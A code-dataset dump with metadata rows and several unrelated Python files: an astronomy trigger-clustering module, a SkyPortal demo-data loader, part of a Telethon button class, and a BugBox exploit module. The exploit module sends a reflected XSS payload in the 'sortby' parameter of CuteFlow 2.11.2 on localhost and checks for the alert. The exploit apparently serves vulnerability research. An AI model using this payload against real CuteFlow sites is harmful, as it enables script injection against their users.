| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
134ae941abed7aefa64cace4d2b745626ee1b2ee
| 28,935
|
py
|
Python
|
darc/amber_clustering.py
|
loostrum/darc
|
977f43652ff4fc873340d09ac0fddeb81b889541
|
[
"Apache-2.0"
] | null | null | null |
darc/amber_clustering.py
|
loostrum/darc
|
977f43652ff4fc873340d09ac0fddeb81b889541
|
[
"Apache-2.0"
] | 47
|
2019-08-27T08:07:06.000Z
|
2022-03-04T10:10:40.000Z
|
darc/amber_clustering.py
|
loostrum/darc
|
977f43652ff4fc873340d09ac0fddeb81b889541
|
[
"Apache-2.0"
] | 1
|
2020-11-24T09:27:56.000Z
|
2020-11-24T09:27:56.000Z
|
#!/usr/bin/env python3
#
# AMBER Clustering
import os
from time import sleep
import yaml
import ast
import threading
import multiprocessing as mp
import numpy as np
from astropy.time import Time, TimeDelta
import astropy.units as u
from astropy.coordinates import SkyCoord
from darc import DARCBase, VOEventQueueServer, LOFARTriggerQueueServer
from darc.definitions import TSAMP, NCHAN, BANDWIDTH, MASTER, TIME_UNIT
from darc.external import tools
from darc import util
class AMBERClusteringException(Exception):
pass
class AMBERClustering(DARCBase):
"""
Trigger IQUV / LOFAR / VOEvent system based on AMBER candidates
1. Cluster incoming triggers
2. Apply thresholds (separate for known and new sources, and for IQUV vs LOFAR)
3. Put IQUV triggers on output queue
4. Put LOFAR triggers on remote LOFAR trigger queue and on VOEvent queue
"""
def __init__(self, *args, connect_vo=True, connect_lofar=True, **kwargs):
"""
:param bool connect_vo: Whether or not to connect to VOEvent queue on master node
:param bool connect_lofar: Whether or not to connect to LOFAR trigger queue on master node
"""
super(AMBERClustering, self).__init__(*args, **kwargs)
self.connect_vo = connect_vo
self.connect_lofar = connect_lofar
self.dummy_queue = mp.Queue()
self.threads = {}
self.hdr_mapping = {}
self.obs_config = None
self.observation_running = False
self.amber_triggers = []
self.source_list = None
self.lock = mp.Lock()
# store when we are allowed to do IQUV / LOFAR triggering
self.time_iquv = Time.now()
# connect to VOEvent generator
if self.connect_vo:
try:
self.vo_queue = self.voevent_connector()
self.logger.info("Connected to VOEvent Generator on master node")
self.have_vo = True
except Exception as e:
self.logger.error("Failed to connect to VOEvent Generator, setting dummy queue ({})".format(e))
self.vo_queue = self.dummy_queue
self.have_vo = False
else:
# dummy queue
self.logger.info("VO Generator connection disabled, setting dummy queue")
self.vo_queue = mp.Queue()
self.have_vo = False
# connect to LOFAR trigger
if self.connect_lofar:
try:
self.lofar_queue = self.lofar_connector()
self.logger.info("Connected to LOFAR Trigger on master node")
self.have_lofar = True
except Exception as e:
self.logger.error("Failed to connect to LOFAR Trigger, setting dummy queue ({})".format(e))
self.lofar_queue = self.dummy_queue
self.have_lofar = False
else:
# dummy queue
self.logger.info("LOFAR Trigger connection disabled, setting dummy queue")
self.lofar_queue = mp.Queue()
self.have_lofar = False
def _load_source_list(self):
"""
Load the list with known source DMs
:return: source list with dict per category
"""
try:
with open(self.source_file, 'r') as f:
source_list = yaml.load(f, Loader=yaml.SafeLoader)
except OSError as e:
raise AMBERClusteringException("Cannot load source list: {}".format(e))
return source_list
def process_command(self, command):
"""
Process command received from queue
:param dict command: Command to process
"""
if command['command'] == 'trigger':
if not self.observation_running:
self.logger.error("Trigger(s) received but no observation is running - ignoring")
else:
with self.lock:
self.amber_triggers.append(command['trigger'])
elif command['command'] == 'get_attr':
self.get_attribute(command)
else:
self.logger.error("Unknown command received: {}".format(command['command']))
def start_observation(self, obs_config, reload=True):
"""
Parse obs config and start listening for amber triggers on queue
:param dict obs_config: Observation configuration
:param bool reload: reload service settings (default: True)
"""
# reload config
if reload:
self.load_config()
# clean any old triggers
self.amber_triggers = []
# parse parset
obs_config['parset'] = self._load_parset(obs_config)
# set config
self.obs_config = obs_config
self.observation_running = True
# (re)load source list in case of changes
self.source_list = self._load_source_list()
# try connecting to VO server if enabled
# always do this in case a connection was available before, but failed at some point
if self.connect_vo:
try:
self.vo_queue = self.voevent_connector()
self.logger.info("Connected to VOEvent Generator on master node")
self.have_vo = True
except Exception as e:
self.logger.error("Failed to connect to VOEvent Generator, setting dummy queue ({})".format(e))
self.vo_queue = self.dummy_queue
self.have_vo = False
# try connecting to LOFAR trigger serverr if enabled
# always do this in case a connection was available before, but failed at some point
if self.connect_lofar:
try:
self.lofar_queue = self.lofar_connector()
self.logger.info("Connected to LOFAR Trigger on master node")
self.have_lofar = True
except Exception as e:
self.logger.error("Failed to connect to LOFAR Trigger, setting dummy queue ({})".format(e))
self.lofar_queue = self.dummy_queue
self.have_lofar = False
# process triggers in thread
self.threads['processing'] = threading.Thread(target=self._process_triggers)
self.threads['processing'].start()
self.logger.info("Observation started")
def stop_observation(self, *args, **kwargs):
"""
Stop observation
"""
# set running to false
self.observation_running = False
# clear triggers
self.amber_triggers = []
# clear header
self.hdr_mapping = {}
# clear config
self.obs_config = None
# clear threads
for key, thread in self.threads.items():
if thread is not None:
thread.join()
self.threads[key] = None
def voevent_connector(self):
"""
Connect to the VOEvent generator on the master node
"""
# Load VO server settings
VOEventQueueServer.register('get_queue')
with open(self.config_file, 'r') as f:
server_config = yaml.load(f, Loader=yaml.SafeLoader)['voevent_generator']
port = server_config['server_port']
key = server_config['server_auth'].encode()
server = VOEventQueueServer(address=(MASTER, port), authkey=key)
server.connect()
return server.get_queue()
def lofar_connector(self):
"""
Connect to the LOFAR triggering system on the master node
"""
# Load LOFAR trigger server settings
LOFARTriggerQueueServer.register('get_queue')
with open(self.config_file, 'r') as f:
server_config = yaml.load(f, Loader=yaml.SafeLoader)['lofar_trigger']
port = server_config['server_port']
key = server_config['server_auth'].encode()
server = LOFARTriggerQueueServer(address=(MASTER, port), authkey=key)
server.connect()
return server.get_queue()
def _get_source(self):
"""
Try to get DM for a known source
:return: DM for known source, else None
"""
# get source name from parset
try:
source = self.obs_config['parset']['task.source.name']
except KeyError:
self.logger.error("Cannot get source name from parset, will not do known-source triggering")
return None, None, None
# check if source is in source list
# first check aliases
try:
alias = self.source_list['aliases'][source]
except KeyError:
# not found
pass
else:
# replace source by alias so we can look it up in other lists
self.logger.info("Using alias {} for source {}".format(alias, source))
source = alias
# check if source is a known pulsar or frb
dm_src = None
src_type = None
for key in ['pulsars', 'frbs']:
try:
dm_src = self.source_list[key][source]
src_type = key[:-1]
except KeyError:
pass
else:
break
return dm_src, src_type, source
def _check_triggers(self, triggers, sys_params, utc_start, datetimesource, dm_min=0, dm_max=np.inf, dm_src=None,
width_max=np.inf, snr_min=8, src_type=None, src_name=None, dmgal=0, pointing=None,
skip_lofar=False):
"""
Cluster triggers and run IQUV and/or LOFAR triggering
:param list triggers: Raw triggers
:param dict sys_params: System parameters (dt, delta_nu_MHz, nu_GHz)
:param str utc_start: start time of observation, in format readable by astropy.time.Time
:param str datetimesource: Field name with date and time
:param float dm_min: minimum DM (default: 0)
:param float dm_max: maximum DM (default: inf)
:param float dm_src: DM of known source (default: None)
:param float width_max: maximum width (default: inf)
:param float snr_min: mininum S/N (default: 8)
:param str src_type: Source type (pulsar, frb, None)
:param str src_name: Source name (default: None)
:param float dmgal: galactic maximum DM
:param astropy.coordinates.SkyCoord pointing: Pointing for LOFAR triggering (default: None)
:param bool skip_lofar: Skip LOFAR triggering (default: False)
"""
# cluster using IQUV thresholds
# LOFAR thresholds are assumed to be more strict for every parameter
cluster_snr, cluster_dm, cluster_time, cluster_downsamp, cluster_sb, _, ncand_per_cluster = \
tools.get_triggers(triggers,
dm_min=dm_min, dm_max=dm_max, sig_thresh=snr_min, t_window=self.clustering_window,
read_beam=True, return_clustcounts=True, sb_filter=self.sb_filter,
sb_filter_period_min=self.sb_filter_period_min,
sb_filter_period_max=self.sb_filter_period_max,
**sys_params)
# select on width
mask = np.array(cluster_downsamp) <= width_max
cluster_snr = np.array(cluster_snr)[mask]
cluster_dm = np.array(cluster_dm)[mask]
cluster_time = np.array(cluster_time)[mask]
cluster_downsamp = np.array(cluster_downsamp)[mask].astype(int)
cluster_sb = np.array(cluster_sb)[mask].astype(int)
ncand_per_cluster = np.array(ncand_per_cluster)[mask].astype(int)
ncluster = len(cluster_snr)
if src_type is not None:
known = 'known'
else:
known = 'new'
self.logger.info("Clustered {} raw triggers into {} IQUV trigger(s) "
"for {} source".format(len(triggers), ncluster, known))
# return if there are no clusters
if ncluster == 0:
return
# there are clusters, do IQUV triggering
# check if we can do triggering
now = Time.now()
if now < self.time_iquv:
self.logger.warning("Cannot trigger IQUV yet, next possible time: {}".format(self.time_iquv))
else:
self.logger.info("Sending IQUV trigger")
# update last trigger time
self.time_iquv = now + TimeDelta(self.thresh_iquv['interval'], format='sec')
# trigger IQUV
dada_triggers = []
for i in range(ncluster):
# send known source dm if available
if dm_src is not None:
dm_to_send = dm_src
else:
dm_to_send = cluster_dm[i]
dada_trigger = {'stokes': 'IQUV', 'dm': dm_to_send, 'beam': cluster_sb[i],
'width': cluster_downsamp[i], 'snr': cluster_snr[i],
'time': cluster_time[i], 'utc_start': utc_start}
dada_triggers.append(dada_trigger)
self.target_queue.put({'command': 'trigger', 'trigger': dada_triggers})
# skip LOFAR triggering for pulsars or if explicitly disabled
if src_type == 'pulsar' or skip_lofar:
return
# select LOFAR thresholds
if src_type is not None:
# known source, use same DM threshold as IQUV, but apply width and S/N thresholds
# DM_min effectively does nothing here because the value is the same as for IQUV
# but it needs to be defined for the mask = line below to work
# no limit on candidates per cluster
snr_min_lofar = self.thresh_lofar['snr_min']
dm_min_lofar = dm_min
width_max_lofar = self.thresh_lofar['width_max']
max_cands_per_cluster = np.inf
# Overrides for specific sources
if src_name in self.lofar_trigger_sources:
# check CB number
try:
allowed_cbs = self.thresh_lofar_override['cb']
if isinstance(allowed_cbs, float):
allowed_cbs = [allowed_cbs]
if self.obs_config['beam'] not in allowed_cbs:
return
except KeyError:
# any CB is valid if cb key is not present
pass
else:
# source known, CB valid: set thresholds
snr_min_lofar = self.thresh_lofar_override['snr_min']
width_max_lofar = self.thresh_lofar_override['width_max']
self.logger.warning("Setting LOFAR trigger thresholds: S/N > {}, "
"downsamp <= {}".format(snr_min_lofar, width_max_lofar))
else:
# new source, apply all LOFAR thresholds
snr_min_lofar = self.thresh_lofar['snr_min']
dm_min_lofar = max(dmgal * self.thresh_lofar['dm_frac_min'], self.dm_min_global)
width_max_lofar = self.thresh_lofar['width_max']
max_cands_per_cluster = self.thresh_lofar['max_cands_per_cluster']
# create mask for given thresholds
# also remove triggers where number of raw candidates is too high (this indicates RFI)
mask = (cluster_snr >= snr_min_lofar) & (cluster_dm >= dm_min_lofar) & \
(cluster_downsamp <= width_max_lofar) & \
(ncand_per_cluster <= max_cands_per_cluster)
# check for any remaining triggers
if np.any(mask):
ncluster = np.sum(mask)
self.logger.info("Found {} possible LOFAR trigger(s)".format(ncluster))
# note: the server keeps track of when LOFAR triggers were sent
# and whether or not a new trigger can be sent
# check if there are multiple triggers
if ncluster > 1:
self.logger.info("Multiple triggers - selecting trigger with highest S/N")
# argmax also works if there is one trigger, so just run it always
ind = np.argmax(cluster_snr[mask])
# estimate flux density based on peak S/N and width
snr = cluster_snr[mask][ind]
width = TSAMP.to(u.ms) * cluster_downsamp[mask][ind]
# astropy units only knows mJy, but the VOEvent Generator expects Jy
flux = util.get_flux(snr, width).to(u.mJy).value / 1000.
# select known source DM if available
if dm_src is not None:
dm_to_send = dm_src
dm_err = 0.
else:
dm_to_send = cluster_dm[mask][ind]
# set DM uncertainty to DM delay across pulse width
# Apertif has roughly 1 DM unit = 1 ms delay across band
dm_err = width.to(u.ms).value
# calculate arrival time at reference frequency = central frequency
cent_freq = sys_params['nu_GHz'] * 1000.
max_freq = cent_freq + .5 * BANDWIDTH.to(u.MHz).value
dm_delay = 4.148808E3 * dm_to_send * (cent_freq**-2 - max_freq**-2)
utc_arr = (utc_start + TimeDelta(cluster_time[mask][ind] - dm_delay, format='sec')).isot
# set a source name
if src_type is not None:
name = src_type
else:
name = 'candidate'
# check whether or not pointing information is available
if pointing is None:
self.logger.error("No pointing information available - cannot trigger LOFAR")
# check if we are connected to the server
elif not self.have_lofar:
self.logger.error("No LOFAR Trigger connection available - cannot trigger LOFAR")
# do the trigger
else:
# create the full trigger and put on VO queue
lofar_trigger = {'dm': dm_to_send,
'dm_err': dm_err,
'width': width.to(u.ms).value, # ms
'snr': snr,
'flux': flux, # Jy
'ra': pointing.ra.deg, # decimal deg
'dec': pointing.dec.deg, # decimal deg
'cb': self.obs_config['beam'],
'sb': cluster_sb[mask][ind],
'ymw16': dmgal,
'semiMaj': 15, # arcmin, CB
'semiMin': 15, # arcmin, CB
'name': name,
'src_name': src_name,
'datetimesource': datetimesource,
'utc': utc_arr,
'tarr': cluster_time[mask][ind],
'importance': 0.1}
# add system parameters (dt, central freq (GHz), bandwidth (MHz))
lofar_trigger.update(sys_params)
self.logger.info("Sending LOFAR trigger to LOFAR Trigger system")
self.lofar_queue.put(lofar_trigger)
if self.have_vo:
self.logger.info("Sending same trigger to VOEvent system")
self.vo_queue.put(lofar_trigger)
else:
self.logger.error("No VOEvent Generator connection available - not sending VO trigger")
def _process_triggers(self):
"""
Read thresholds (DM, width, S/N) for clustering
Continuously read AMBER triggers from queue and start processing for known and/or new sources
"""
# set observation parameters
utc_start = Time(self.obs_config['startpacket'] / TIME_UNIT, format='unix')
datetimesource = self.obs_config['datetimesource']
dt = TSAMP.to(u.second).value
chan_width = (BANDWIDTH / float(NCHAN)).to(u.MHz).value
cent_freq = (self.obs_config['min_freq'] * u.MHz + 0.5 * BANDWIDTH).to(u.GHz).value
sys_params = {'dt': dt, 'delta_nu_MHz': chan_width, 'nu_GHz': cent_freq}
pointing = self._get_pointing()
dmgal = util.get_ymw16(self.obs_config['parset'], self.obs_config['beam'], self.logger)
# get known source dm and type
dm_src, src_type, src_name = self._get_source()
if src_type is not None:
thresh_src = {'dm_src': dm_src,
'src_type': src_type,
'src_name': src_name,
'dm_min': max(dm_src - self.dm_range, self.dm_min_global),
'dm_max': dm_src + self.dm_range,
'width_max': np.inf,
'snr_min': self.snr_min_global,
'pointing': pointing,
'dmgal': dmgal
}
self.logger.info("Setting {src_name} trigger DM range to {dm_min} - {dm_max}, "
"max downsamp={width_max}, min S/N={snr_min}".format(**thresh_src))
# set min and max DM for new sources with unknown DM
thresh_new = {'src_type': None,
'src_name': None,
'dm_min': max(dmgal * self.thresh_iquv['dm_frac_min'], self.dm_min_global),
'dm_max': np.inf,
'width_max': self.thresh_iquv['width_max'],
'snr_min': self.thresh_iquv['snr_min'],
'pointing': pointing,
'dmgal': dmgal
}
# if known source, check whether or not LOFAR triggering should be enabled for new sources
if src_type is not None and src_name in self.lofar_trigger_sources:
thresh_new['skip_lofar'] = not self.thresh_lofar['trigger_on_new_sources']
else:
thresh_new['skip_lofar'] = False
self.logger.info("Setting new source trigger DM range to {dm_min} - {dm_max}, "
"max downsamp={width_max}, min S/N={snr_min}, skip LOFAR "
"triggering={skip_lofar}".format(**thresh_new))
# main loop
while self.observation_running:
if self.amber_triggers:
# Copy the triggers so class-wide list can receive new triggers without those getting lost
with self.lock:
triggers = self.amber_triggers
self.amber_triggers = []
# check for header (always, because it is received once for every amber instance)
if not self.hdr_mapping:
for trigger in triggers:
if trigger.startswith('#'):
# read header, remove comment symbol
header = trigger.split()[1:]
self.logger.info("Received header: {}".format(header))
# Check if all required params are present and create mapping to col index
keys = ['beam_id', 'integration_step', 'time', 'DM', 'SNR']
for key in keys:
try:
self.hdr_mapping[key] = header.index(key)
except ValueError:
self.logger.error("Key missing from clusters header: {}".format(key))
self.hdr_mapping = {}
return
# header should be present now
if not self.hdr_mapping:
self.logger.error("First clusters received but header not found")
continue
# remove headers from triggers (i.e. any trigger starting with #)
triggers = [trigger for trigger in triggers if not trigger.startswith('#')]
# triggers is empty if only header was received
if not triggers:
self.logger.info("Only header received - Canceling processing")
continue
# split strings and convert to numpy array
try:
triggers = np.array(list(map(lambda val: val.split(), triggers)), dtype=float)
except Exception as e:
self.logger.error("Failed to process triggers: {}".format(e))
continue
# pick columns to feed to clustering algorithm
triggers_for_clustering = triggers[:, (self.hdr_mapping['DM'], self.hdr_mapping['SNR'],
self.hdr_mapping['time'], self.hdr_mapping['integration_step'],
self.hdr_mapping['beam_id'])]
# known source and new source triggering, in thread so clustering itself does not
# delay next run
# known source triggering
if src_type is not None:
self.threads['trigger_known_source'] = threading.Thread(target=self._check_triggers,
args=(triggers_for_clustering, sys_params,
utc_start, datetimesource),
kwargs=thresh_src)
self.threads['trigger_known_source'].start()
# new source triggering
self.threads['trigger_new_source'] = threading.Thread(target=self._check_triggers,
args=(triggers_for_clustering, sys_params,
utc_start, datetimesource),
kwargs=thresh_new)
self.threads['trigger_new_source'].start()
sleep(self.interval)
self.logger.info("Observation finished")
def _get_pointing(self):
"""
Get pointing of this CB from parset
:return: pointing SkyCoord
"""
# read parset
try:
parset = self.obs_config['parset']
except KeyError as e:
self.logger.error("Cannot read parset ({})".format(e))
return None
# read beam
try:
beam = self.obs_config['beam']
except KeyError as e:
self.logger.error("Cannot read beam from parset, setting CB to 0 ({})".format(e))
beam = 0
# read beam coordinates from parset
try:
key = "task.beamSet.0.compoundBeam.{}.phaseCenter".format(beam)
c1, c2 = ast.literal_eval(parset[key].replace('deg', ''))
c1 = c1 * u.deg
c2 = c2 * u.deg
except Exception as e:
self.logger.error("Could not parse pointing for CB{:02d} ({})".format(beam, e))
return None
# convert HA to RA if HADEC is used
if parset['task.directionReferenceFrame'].upper() == 'HADEC':
# Get RA at the mid point of the observation
timestamp = Time(parset['task.startTime']) + .5 * float(parset['task.duration']) * u.s
c1, c2 = util.radec_to_hadec(c1, c2, timestamp)
# create SkyCoord object
pointing = SkyCoord(c1, c2)
return pointing
def _load_parset(self, obs_config):
"""
Load the observation parset
:param dict obs_config: Observation config
:return: parset as dict
"""
try:
# encoded parset is already in config on master node
# decode the parset
raw_parset = util.decode_parset(obs_config['parset'])
# convert to dict and store
parset = util.parse_parset(raw_parset)
except KeyError:
self.logger.info("Observation parset not found in input config, looking for master parset")
# Load the parset from the master parset file
master_config_file = os.path.join(obs_config['master_dir'], 'parset', 'darc_master.parset')
try:
# Read raw config
with open(master_config_file) as f:
master_config = f.read().strip()
# Convert to dict
master_config = util.parse_parset(master_config)
# extract obs parset and decode
raw_parset = util.decode_parset(master_config['parset'])
parset = util.parse_parset(raw_parset)
except Exception as e:
self.logger.warning(
"Failed to load parset from master config file {}, "
"setting parset to None: {}".format(master_config_file, e))
parset = None
return parset
| 44.930124
| 118
| 0.55718
| 3,316
| 28,935
| 4.707479
| 0.145054
| 0.025625
| 0.017937
| 0.007495
| 0.240423
| 0.201986
| 0.174375
| 0.148815
| 0.148815
| 0.140807
| 0
| 0.003566
| 0.36029
| 28,935
| 643
| 119
| 45
| 0.839762
| 0.207258
| 0
| 0.340686
| 0
| 0
| 0.136229
| 0.007971
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029412
| false
| 0.009804
| 0.036765
| 0
| 0.102941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
134b9c14653c7fb4e1904d66229452a0dbe85152
| 9,811
|
py
|
Python
|
tools/load_demo_data.py
|
glenn2763/skyportal
|
79dc11bfe08076d9c1f920bad85681ab001e22c8
|
[
"BSD-3-Clause"
] | null | null | null |
tools/load_demo_data.py
|
glenn2763/skyportal
|
79dc11bfe08076d9c1f920bad85681ab001e22c8
|
[
"BSD-3-Clause"
] | null | null | null |
tools/load_demo_data.py
|
glenn2763/skyportal
|
79dc11bfe08076d9c1f920bad85681ab001e22c8
|
[
"BSD-3-Clause"
] | null | null | null |
import datetime
import os
import subprocess
import base64
from pathlib import Path
import shutil
import pandas as pd
import signal
import requests
from baselayer.app.env import load_env
from baselayer.app.model_util import status, create_tables, drop_tables
from social_tornado.models import TornadoStorage
from skyportal.models import init_db, Base, DBSession, Source, User
from skyportal.model_util import setup_permissions, create_token
from skyportal.tests import api
from baselayer.tools.test_frontend import verify_server_availability
if __name__ == "__main__":
"""Insert test data"""
env, cfg = load_env()
basedir = Path(os.path.dirname(__file__)) / ".."
with status(f"Connecting to database {cfg['database']['database']}"):
init_db(**cfg["database"])
with status("Dropping all tables"):
drop_tables()
with status("Creating tables"):
create_tables()
for model in Base.metadata.tables:
print(" -", model)
with status(f"Creating permissions"):
setup_permissions()
with status(f"Creating dummy users"):
super_admin_user = User(
username="testuser@cesium-ml.org", role_ids=["Super admin"]
)
group_admin_user = User(
username="groupadmin@cesium-ml.org", role_ids=["Super admin"]
)
full_user = User(username="fulluser@cesium-ml.org", role_ids=["Full user"])
view_only_user = User(
username="viewonlyuser@cesium-ml.org", role_ids=["View only"]
)
DBSession().add_all(
[super_admin_user, group_admin_user, full_user, view_only_user]
)
for u in [super_admin_user, group_admin_user, full_user, view_only_user]:
DBSession().add(
TornadoStorage.user.create_social_auth(u, u.username, "google-oauth2")
)
with status("Creating token"):
token = create_token(
[
"Manage groups",
"Manage sources",
"Upload data",
"Comment",
"Manage users",
],
super_admin_user.id,
"load_demo_data token",
)
def assert_post(endpoint, data):
response_status, data = api("POST", endpoint, data, token)
if not response_status == 200 and data["status"] == "success":
raise RuntimeError(
f'API call to {endpoint} failed with status {status}: {data["message"]}'
)
return data
with status("Launching web app & executing API calls"):
try:
response_status, data = api("GET", "sysinfo", token=token)
app_already_running = True
except requests.ConnectionError:
app_already_running = False
web_client = subprocess.Popen(
["make", "run"], cwd=basedir, preexec_fn=os.setsid
)
server_url = f"http://localhost:{cfg['ports.app']}"
print()
print(f"Waiting for server to appear at {server_url}...")
try:
verify_server_availability(server_url)
print("App running - continuing with API calls")
with status("Creating dummy group & adding users"):
data = assert_post(
"groups",
data={
"name": "Stream A",
"group_admins": [
super_admin_user.username,
group_admin_user.username,
],
},
)
group_id = data["data"]["id"]
for u in [view_only_user, full_user]:
data = assert_post(
f"groups/{group_id}/users/{u.username}", data={"admin": False}
)
with status("Creating dummy instruments"):
data = assert_post(
"telescope",
data={
"name": "Palomar 1.5m",
"nickname": "P60",
"lat": 33.3633675,
"lon": -116.8361345,
"elevation": 1870,
"diameter": 1.5,
"group_ids": [group_id],
},
)
telescope1_id = data["data"]["id"]
data = assert_post(
"instrument",
data={
"name": "P60 Camera",
"type": "phot",
"band": "optical",
"telescope_id": telescope1_id,
},
)
instrument1_id = data["data"]["id"]
data = assert_post(
"telescope",
data={
"name": "Nordic Optical Telescope",
"nickname": "NOT",
"lat": 28.75,
"lon": 17.88,
"elevation": 1870,
"diameter": 2.56,
"group_ids": [group_id],
},
)
telescope2_id = data["data"]["id"]
data = assert_post(
"instrument",
data={
"name": "ALFOSC",
"type": "both",
"band": "optical",
"telescope_id": telescope2_id,
},
)
with status("Creating dummy sources"):
SOURCES = [
{
"id": "14gqr",
"ra": 353.36647,
"dec": 33.646149,
"redshift": 0.063,
"group_ids": [group_id],
"comments": [
"No source at transient location to R>26 in LRIS imaging",
"Strong calcium lines have emerged.",
],
},
{
"id": "16fil",
"ra": 322.718872,
"dec": 27.574113,
"redshift": 0.0,
"group_ids": [group_id],
"comments": ["Frogs in the pond", "The eagle has landed"],
},
]
(basedir / "static/thumbnails").mkdir(parents=True, exist_ok=True)
for source_info in SOURCES:
comments = source_info.pop("comments")
data = assert_post("sources", data=source_info)
assert data["data"]["id"] == source_info["id"]
for comment in comments:
data = assert_post(
"comment",
data={"source_id": source_info["id"], "text": comment},
)
phot_file = basedir / "skyportal/tests/data/phot.csv"
phot_data = pd.read_csv(phot_file)
data = assert_post(
"photometry",
data={
"source_id": source_info["id"],
"time_format": "iso",
"time_scale": "utc",
"instrument_id": instrument1_id,
"observed_at": phot_data.observed_at.tolist(),
"mag": phot_data.mag.tolist(),
"e_mag": phot_data.e_mag.tolist(),
"lim_mag": phot_data.lim_mag.tolist(),
"filter": phot_data["filter"].tolist(),
},
)
spec_file = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
"skyportal",
"tests",
"data",
"spec.csv",
)
spec_data = pd.read_csv(spec_file)
for i, df in spec_data.groupby("instrument_id"):
data = assert_post(
"spectrum",
data={
"source_id": source_info["id"],
"observed_at": str(datetime.datetime(2014, 10, 24)),
"instrument_id": 1,
"wavelengths": df.wavelength.tolist(),
"fluxes": df.flux.tolist(),
},
)
for ttype in ["new", "ref", "sub"]:
fname = f'{source_info["id"]}_{ttype}.png'
fpath = basedir / f"skyportal/tests/data/{fname}"
thumbnail_data = base64.b64encode(
open(os.path.abspath(fpath), "rb").read()
)
data = assert_post(
"thumbnail",
data={
"source_id": source_info["id"],
"data": thumbnail_data,
"ttype": ttype,
},
)
source = Source.query.get(source_info["id"])
source.add_linked_thumbnails()
finally:
if not app_already_running:
print("Terminating web app")
os.killpg(os.getpgid(web_client.pid), signal.SIGTERM)
| 37.446565
| 88
| 0.428804
| 835
| 9,811
| 4.838323
| 0.323353
| 0.029703
| 0.038119
| 0.017327
| 0.126733
| 0.101485
| 0.065842
| 0.045545
| 0.045545
| 0.045545
| 0
| 0.02218
| 0.466925
| 9,811
| 261
| 89
| 37.590038
| 0.750287
| 0
| 0
| 0.165217
| 0
| 0
| 0.172745
| 0.025232
| 0
| 0
| 0
| 0
| 0.056522
| 1
| 0.004348
| false
| 0
| 0.069565
| 0
| 0.078261
| 0.021739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
134f9288b26ce3d17a1dc1a42f04cbaea4914dea
| 1,537
|
py
|
Python
|
framework/Exploits/CUTEFLOW_0024.py
|
UncleWillis/BugBox
|
25682f25fc3222db383649a4924bcd65f2ddcb34
|
[
"BSD-3-Clause"
] | 1
|
2019-01-25T21:32:42.000Z
|
2019-01-25T21:32:42.000Z
|
framework/Exploits/CUTEFLOW_0024.py
|
UncleWillis/BugBox
|
25682f25fc3222db383649a4924bcd65f2ddcb34
|
[
"BSD-3-Clause"
] | null | null | null |
framework/Exploits/CUTEFLOW_0024.py
|
UncleWillis/BugBox
|
25682f25fc3222db383649a4924bcd65f2ddcb34
|
[
"BSD-3-Clause"
] | 1
|
2021-06-23T04:44:25.000Z
|
2021-06-23T04:44:25.000Z
|
# Copyright 2013 University of Maryland. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE.TXT file.
import sys
import os
import time
from selenium.common.exceptions import NoAlertPresentException
import framework
class Exploit (framework.Exploit):
attributes = {'Name' : "CUTEFLOW_0024",
'Description' : "CuteFlow v2.11.2 cross site scripting attack.",
'References' : [['http://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/']],
'Target' : "CuteFlow 2.11.2",
'TargetLicense' : '',
'VulWikiPage' : "",
'Type' : 'XSS'
}
def __init__(self, visible=False):
framework.Exploit.__init__(self, visible)
self.verified = False
return
def exploit(self):
driver = self.create_selenium_driver()
driver.get("http://localhost/cuteflow/pages/showmaillist.php?sortby=\"><script>alert(\"XSS\");</script><p+\"")
self.logger.info("XSS link visited")
try:
driver.get_alert()
self.logger.info("XSS popup comfirmed")
self.verified = True
except NoAlertPresentException:
self.logger.error("XSS failed")
if self.visible:
time.sleep(10)
driver.cleanup()
return
def verify(self):
return self.verified
| 29
| 134
| 0.582954
| 160
| 1,537
| 5.525
| 0.625
| 0.010181
| 0.024887
| 0.027149
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028116
| 0.305791
| 1,537
| 52
| 135
| 29.557692
| 0.800375
| 0.1054
| 0
| 0.058824
| 0
| 0.029412
| 0.243066
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088235
| false
| 0
| 0.147059
| 0.029412
| 0.382353
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
134fbec769aed9e0795c724b3dcc54286150a284
| 10,720
|
py
|
Python
|
telethon/tl/custom/button.py
|
HosseyNJF/Telethon
|
0b0a1dc6a1a3f2fc8593526549889fba2884e8b8
|
[
"MIT"
] | 4
|
2020-11-28T08:50:07.000Z
|
2020-12-13T03:44:05.000Z
|
telethon/tl/custom/button.py
|
HosseyNJF/Telethon
|
0b0a1dc6a1a3f2fc8593526549889fba2884e8b8
|
[
"MIT"
] | 4
|
2020-10-11T15:40:17.000Z
|
2020-10-22T09:06:58.000Z
|
telethon/tl/custom/button.py
|
HosseyNJF/Telethon
|
0b0a1dc6a1a3f2fc8593526549889fba2884e8b8
|
[
"MIT"
] | 2
|
2020-01-16T12:21:02.000Z
|
2021-12-16T01:30:11.000Z
|
from .. import types
from ... import utils
class Button:
"""
.. note::
This class is used to **define** reply markups, e.g. when
sending a message or replying to events. When you access
`Message.buttons <telethon.tl.custom.message.Message.buttons>`
they are actually `MessageButton
